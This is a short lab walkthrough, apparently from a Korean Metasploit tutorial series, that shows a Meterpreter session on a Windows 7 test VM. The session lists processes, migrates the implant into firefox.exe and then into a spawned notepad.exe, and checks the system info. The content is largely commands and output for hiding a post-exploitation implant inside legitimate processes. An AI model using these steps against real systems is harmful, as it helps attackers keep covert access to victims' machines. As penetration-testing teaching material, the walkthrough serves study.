[MAD-METASPLOIT] 0x31 - Migrate & Hiding process
Process Migrate
meterpreter > ps
Process List
PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process]
4 0 System x86 0
252 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
264 472 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
324 2716 firefox.exe x86 1 HAHWUL\Test-Virtualbox C:\Program Files\Mozilla Firefox\firefox.exe
328 320 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
376 320 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
384 368 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
412 368 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
472 376 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
480 376 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
488 376 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
608 472 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
668 472 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\VBoxService.exe
676 4416 QQPCNetFlow.exe x86 1 HAHWUL\Test-Virtualbox C:\Program Files\Tencent
…snip..
7884 608 Tencentdl.exe x86 1 HAHWUL\Test-Virtualbox C:\program files\common files\tencent\qqdownload\130\tencentdl.exe
8064 472 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
meterpreter > meterpreter > migrate 324 [] Migrating from 5908 to 324… [] Migration completed successfully.
post 모듈을 이용한 Migrate
meterpreter > run post/windows/manage/migrate [] Running module against HAHWUL [] Current server process: firefox.exe (324) [*] Spawning notepad.exe process to migrate to [+] Migrating to 7428 [+] Successfully migrated to process 7428
meterpreter > ps ..snip.. 7428 324 notepad.exe x86 1 HAHWUL\Test-Virtualbox C:\Windows\system32\notepad.exe ..snip..
meterpreter > sysinfo Computer : HAHWUL OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : ko_KR Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > getuid Server username: HAHWUL\Test-Virtualbox